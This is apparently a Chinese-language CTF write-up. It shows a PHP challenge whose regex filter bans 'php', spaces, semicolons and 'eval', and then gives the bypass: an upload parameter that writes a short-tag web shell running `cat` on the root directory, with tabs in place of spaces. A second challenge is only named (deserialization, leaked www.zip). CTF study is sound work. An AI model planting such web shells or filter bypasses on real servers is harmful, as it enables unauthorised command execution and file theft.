#第一道题
=

write shell
-
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>
```
先测试

?action=pwd

得到目录

sandbox/9a620ffd55475c0bd02dbf84c4273f6f/

然后看过滤了php用短标签代替，空格用制表符代替

?action=upload&data=<?`cat\t/*`?>

之后去刚才那个目录查看flag

#第二道题
=

easytp
-
考点：反序列化

刚开始/www.zip源码泄露，我是直接看wp看到的，扫目录肯定能扫到也

之后代码审计




